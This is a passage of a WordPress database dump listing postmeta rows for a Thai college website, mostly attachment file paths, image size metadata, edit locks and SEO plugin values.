(12471, 5535, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:62:\"2019/04/ค่าลงทะเบียน-1-2562_Page_6.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:62:\"ค่าลงทะเบียน-1-2562_Page_6-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:62:\"ค่าลงทะเบียน-1-2562_Page_6-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:63:\"ค่าลงทะเบียน-1-2562_Page_6-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:63:\"ค่าลงทะเบียน-1-2562_Page_6-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:62:\"ค่าลงทะเบียน-1-2562_Page_6-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12472, 5536, '_wp_attached_file', '2019/04/ค่าลงทะเบียน-1-2562_Page_7.png'),
(12473, 5536, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:62:\"2019/04/ค่าลงทะเบียน-1-2562_Page_7.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:62:\"ค่าลงทะเบียน-1-2562_Page_7-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:62:\"ค่าลงทะเบียน-1-2562_Page_7-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:63:\"ค่าลงทะเบียน-1-2562_Page_7-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:63:\"ค่าลงทะเบียน-1-2562_Page_7-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:62:\"ค่าลงทะเบียน-1-2562_Page_7-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12526, 5562, '_edit_lock', '1557029665:1'),
(12527, 5562, '_edit_last', '1'),
(12528, 5563, '_wp_attached_file', '2019/05/201905031432-1.pdf'),
(12529, 5564, '_wp_attached_file', '2019/05/201905031432.pdf'),
(12533, 5562, '_hide_featured', NULL),
(12534, 5562, '_yoast_wpseo_content_score', '60'),
(12535, 5562, '_yoast_wpseo_primary_category', '39'),
(12536, 5562, '_wpas_done_all', '1'),
(12537, 5562, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575147502;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4139;}i:1;a:1:{s:2:\"id\";i:6008;}i:2;a:1:{s:2:\"id\";i:5906;}}}}'),
(12538, 5566, '_edit_lock', '1557029799:1'),
(12539, 5566, '_edit_last', '1'),
(12543, 5566, '_hide_featured', NULL),
(12544, 5566, '_yoast_wpseo_content_score', '60'),
(12545, 5566, '_yoast_wpseo_primary_category', '39'),
(12546, 5566, '_wpas_done_all', '1'),
(12549, 5566, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575368632;s:7:\"payload\";a:0:{}}}'),
(12553, 5569, '_edit_lock', '1557809326:12'),
(12554, 5569, '_edit_last', '12'),
(12555, 5570, '_wp_attached_file', '2019/05/ประกาศรายชื่อผุ้มีสิทธิ์สอบ.pdf'),
(12559, 5569, '_hide_featured', NULL),
(12560, 5569, '_yoast_wpseo_content_score', '90'),
(12561, 5569, '_yoast_wpseo_primary_category', '3'),
(12562, 5569, '_wpas_done_all', '1'),
(12563, 5569, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575032677;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5481;}i:1;a:1:{s:2:\"id\";i:5648;}i:2;a:1:{s:2:\"id\";i:5973;}}}}'),
(12567, 5575, '_edit_lock', '1557989882:12'),
(12568, 5575, '_edit_last', '12'),
(12569, 5575, '_hide_featured', NULL),
(12570, 5575, '_yoast_wpseo_content_score', '90'),
(12571, 5575, '_yoast_wpseo_primary_category', '3'),
(12572, 5577, '_wp_attached_file', '2019/05/ประกาศรายชื่อผู้สอบผ่านคัดเลือก.pdf'),
(12576, 5575, '_wpas_done_all', '1'),
(12577, 5575, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575586071;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6265;}i:1;a:1:{s:2:\"id\";i:5046;}i:2;a:1:{s:2:\"id\";i:6005;}}}}'),
(12578, 5582, '_edit_lock', '1558456406:12'),
(12579, 5582, '_edit_last', '12'),
(12584, 5582, '_hide_featured', NULL),
(12585, 5582, '_yoast_wpseo_content_score', '90'),
(12586, 5582, '_yoast_wpseo_primary_category', '3'),
(12587, 5582, '_wpas_done_all', '1'),
(12588, 5582, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575725050;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6271;}i:1;a:1:{s:2:\"id\";i:6278;}i:2;a:1:{s:2:\"id\";i:6344;}}}}'),
(12589, 5585, '_wp_attached_file', '2019/05/ประกาศรับสมัครครูอัตราจ้าง-1.pdf'),
(12594, 5589, '_edit_lock', '1558456968:12'),
(12595, 5589, '_edit_last', '12'),
(12596, 5590, '_wp_attached_file', '2019/05/boontam.pdf'),
(12600, 5589, '_hide_featured', NULL),
(12601, 5589, '_yoast_wpseo_content_score', '90'),
(12602, 5589, '_yoast_wpseo_primary_category', '3'),
(12603, 5589, '_wpas_done_all', '1'),
(12604, 5589, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575104164;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5952;}i:1;a:1:{s:2:\"id\";i:5680;}i:2;a:1:{s:2:\"id\";i:5830;}}}}'),
(12607, 5593, '_wp_attached_file', '2019/05/ประกาศรับสมัครครูอัตราจ้าง.pdf'),
(12619, 5597, '_edit_lock', '1558925384:12'),
(12620, 5597, '_edit_last', '12'),
(12621, 5599, '_wp_attached_file', '2019/05/270562-โครงการประชุมเครือข่ายผู้ปกครอง-วันอาทิตย์ที่-๒๖-พฤษภาคม-๒๕๖๒-ระดับ-ปวช.๒๓-และ-ปวส.๒.jpg'),
(12622, 5599, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:251:\"2019/05/270562-โครงการประชุมเครือข่ายผู้ปกครอง-วันอาทิตย์ที่-๒๖-พฤษภาคม-๒๕๖๒-ระดับ-ปวช.๒๓-และ-ปวส.๒.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:251:\"270562-โครงการประชุมเครือข่ายผู้ปกครอง-วันอาทิตย์ที่-๒๖-พฤษภาคม-๒๕๖๒-ระดับ-ปวช.๒๓-และ-ปวส.๒-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:251:\"270562-โครงการประชุมเครือข่ายผู้ปกครอง-วันอาทิตย์ที่-๒๖-พฤษภาคม-๒๕๖๒-ระดับ-ปวช.๒๓-และ-ปวส.๒-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:251:\"270562-โครงการประชุมเครือข่ายผู้ปกครอง-วันอาทิตย์ที่-๒๖-พฤษภาคม-๒๕๖๒-ระดับ-ปวช.๒๓-และ-ปวส.๒-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:252:\"270562-โครงการประชุมเครือข่ายผู้ปกครอง-วันอาทิตย์ที่-๒๖-พฤษภาคม-๒๕๖๒-ระดับ-ปวช.๒๓-และ-ปวส.๒-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:251:\"270562-โครงการประชุมเครือข่ายผู้ปกครอง-วันอาทิตย์ที่-๒๖-พฤษภาคม-๒๕๖๒-ระดับ-ปวช.๒๓-และ-ปวส.๒-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12623, 5600, '_wp_attached_file', '2019/05/270562-โครงการประชุมเครือข่ายผู้ปกครอง-วันอาทิตย์ที่-๒๖-พฤษภาคม-๒๕๖๒-ระดับ-ปวช.๒๓-และ-ปวส.๒-1.jpg'),
(12624, 5600, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:253:\"2019/05/270562-โครงการประชุมเครือข่ายผู้ปกครอง-วันอาทิตย์ที่-๒๖-พฤษภาคม-๒๕๖๒-ระดับ-ปวช.๒๓-และ-ปวส.๒-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:253:\"270562-โครงการประชุมเครือข่ายผู้ปกครอง-วันอาทิตย์ที่-๒๖-พฤษภาคม-๒๕๖๒-ระดับ-ปวช.๒๓-และ-ปวส.๒-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:253:\"270562-โครงการประชุมเครือข่ายผู้ปกครอง-วันอาทิตย์ที่-๒๖-พฤษภาคม-๒๕๖๒-ระดับ-ปวช.๒๓-และ-ปวส.๒-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:253:\"270562-โครงการประชุมเครือข่ายผู้ปกครอง-วันอาทิตย์ที่-๒๖-พฤษภาคม-๒๕๖๒-ระดับ-ปวช.๒๓-และ-ปวส.๒-1-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:254:\"270562-โครงการประชุมเครือข่ายผู้ปกครอง-วันอาทิตย์ที่-๒๖-พฤษภาคม-๒๕๖๒-ระดับ-ปวช.๒๓-และ-ปวส.๒-1-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:253:\"270562-โครงการประชุมเครือข่ายผู้ปกครอง-วันอาทิตย์ที่-๒๖-พฤษภาคม-๒๕๖๒-ระดับ-ปวช.๒๓-และ-ปวส.๒-1-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12625, 5597, '_thumbnail_id', '5599'),
(12629, 5597, '_hide_featured', NULL),
(12630, 5597, '_yoast_wpseo_content_score', '30'),
(12631, 5597, '_yoast_wpseo_primary_category', '31'),
(12632, 5597, '_wpas_done_all', '1'),
(12635, 5597, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1574985481;s:7:\"payload\";a:0:{}}}'),
(12641, 5604, '_edit_lock', '1558926105:12'),
(12642, 5604, '_edit_last', '12'),
(12643, 5605, '_wp_attached_file', '2019/05/270562-กีฬาเยาวชน.jpg'),
(12644, 5605, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:960;s:6:\"height\";i:720;s:4:\"file\";s:49:\"2019/05/270562-กีฬาเยาวชน.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:49:\"270562-กีฬาเยาวชน-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:49:\"270562-กีฬาเยาวชน-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:49:\"270562-กีฬาเยาวชน-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:49:\"270562-กีฬาเยาวชน-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12645, 5604, '_thumbnail_id', '5605'),
(12649, 5604, '_hide_featured', NULL),
(12650, 5604, '_yoast_wpseo_content_score', '30'),
(12651, 5604, '_yoast_wpseo_primary_category', '31'),
(12652, 5604, '_wpas_done_all', '1'),
(12653, 5604, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575678214;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3965;}i:1;a:1:{s:2:\"id\";i:6054;}i:2;a:1:{s:2:\"id\";i:3961;}}}}'),
(12655, 5608, '_edit_lock', '1559016691:3'),
(12656, 5608, '_edit_last', '3'),
(12657, 5609, '_wp_attached_file', '2019/05/280562-ประชาสัมพันธ์.jpg'),
(12658, 5609, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:680;s:6:\"height\";i:960;s:4:\"file\";s:58:\"2019/05/280562-ประชาสัมพันธ์.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"280562-ประชาสัมพันธ์-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"280562-ประชาสัมพันธ์-213x300.jpg\";s:5:\"width\";i:213;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"280562-ประชาสัมพันธ์-213x300.jpg\";s:5:\"width\";i:213;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12659, 5608, '_thumbnail_id', '5609'),
(12663, 5608, '_hide_featured', NULL),
(12664, 5608, '_yoast_wpseo_content_score', '30'),
(12665, 5608, '_yoast_wpseo_primary_category', '31'),
(12666, 5608, '_wpas_done_all', '1'),
(12667, 5608, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575694968;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6259;}i:1;a:1:{s:2:\"id\";i:5469;}i:2;a:1:{s:2:\"id\";i:6173;}}}}'),
(12690, 5625, '_edit_lock', '1559034493:3'),
(12691, 5625, '_edit_last', '3'),
(12693, 5629, '_wp_attached_file', '2019/05/Document-page-001.jpg'),
(12694, 5629, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1754;s:6:\"height\";i:1240;s:4:\"file\";s:29:\"2019/05/Document-page-001.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"Document-page-001-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"Document-page-001-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"Document-page-001-768x543.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"Document-page-001-1024x724.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"Document-page-001-400x283.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12695, 5625, '_thumbnail_id', '5629'),
(12699, 5625, '_hide_featured', NULL),
(12700, 5625, '_yoast_wpseo_content_score', '30'),
(12701, 5625, '_yoast_wpseo_primary_category', '3'),
(12702, 5625, '_wpas_done_all', '1'),
(12705, 5625, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575370858;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5631;}i:1;a:1:{s:2:\"id\";i:5156;}i:2;a:1:{s:2:\"id\";i:6152;}}}}'),
(12706, 5631, '_edit_lock', '1559035172:3'),
(12707, 5631, '_edit_last', '3'),
(12708, 5632, '_wp_attached_file', '2019/05/Document-page-002.jpg'),
(12709, 5632, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1754;s:6:\"height\";i:1240;s:4:\"file\";s:29:\"2019/05/Document-page-002.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"Document-page-002-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"Document-page-002-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"Document-page-002-768x543.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"Document-page-002-1024x724.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"Document-page-002-400x283.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12710, 5631, '_thumbnail_id', '5632'),
(12714, 5631, '_hide_featured', NULL),
(12715, 5631, '_yoast_wpseo_content_score', '30'),
(12716, 5631, '_yoast_wpseo_primary_category', '3'),
(12717, 5631, '_wpas_done_all', '1'),
(12720, 5631, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575456696;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5625;}i:1;a:1:{s:2:\"id\";i:5038;}i:2;a:1:{s:2:\"id\";i:5156;}}}}'),
(12721, 5635, '_edit_lock', '1559112720:14'),
(12722, 5635, '_edit_last', '14'),
(12723, 5636, '_wp_attached_file', '2019/05/61123187_822677991441724_4660735846322798592_o.jpg'),
(12724, 5636, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1478;s:6:\"height\";i:1108;s:4:\"file\";s:58:\"2019/05/61123187_822677991441724_4660735846322798592_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"61123187_822677991441724_4660735846322798592_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"61123187_822677991441724_4660735846322798592_o-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"61123187_822677991441724_4660735846322798592_o-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"61123187_822677991441724_4660735846322798592_o-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"61123187_822677991441724_4660735846322798592_o-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12725, 5635, '_thumbnail_id', '5636'),
(12729, 5635, '_hide_featured', NULL),
(12730, 5635, '_yoast_wpseo_content_score', '30'),
(12731, 5635, '_yoast_wpseo_primary_category', '31'),
(12732, 5635, '_wpas_done_all', '1'),
(12735, 5635, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575567347;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4967;}i:1;a:1:{s:2:\"id\";i:6285;}i:2;a:1:{s:2:\"id\";i:3975;}}}}'),
(12740, 5640, '_edit_lock', '1559639858:14'),
(12741, 5640, '_edit_last', '14'),
(12742, 5641, '_wp_attached_file', '2019/05/ประกาศรับสมัคร-จนท.-พขร..pdf'),
(12743, 5642, '_wp_attached_file', '2019/05/ประกาศรับสมัคร-จนท.-พขร.-1.pdf'),
(12744, 5643, '_wp_attached_file', '2019/05/ประกาศรับสมัคร-จนท.-พขร.-2.pdf'),
(12745, 5644, '_wp_attached_file', '2019/05/Document-page-001-1.jpg'),
(12746, 5644, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1241;s:6:\"height\";i:1754;s:4:\"file\";s:31:\"2019/05/Document-page-001-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"Document-page-001-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"Document-page-001-1-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"Document-page-001-1-768x1085.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1085;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"Document-page-001-1-725x1024.jpg\";s:5:\"width\";i:725;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:31:\"Document-page-001-1-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12747, 5645, '_wp_attached_file', '2019/05/Document-page-002-1.jpg'),
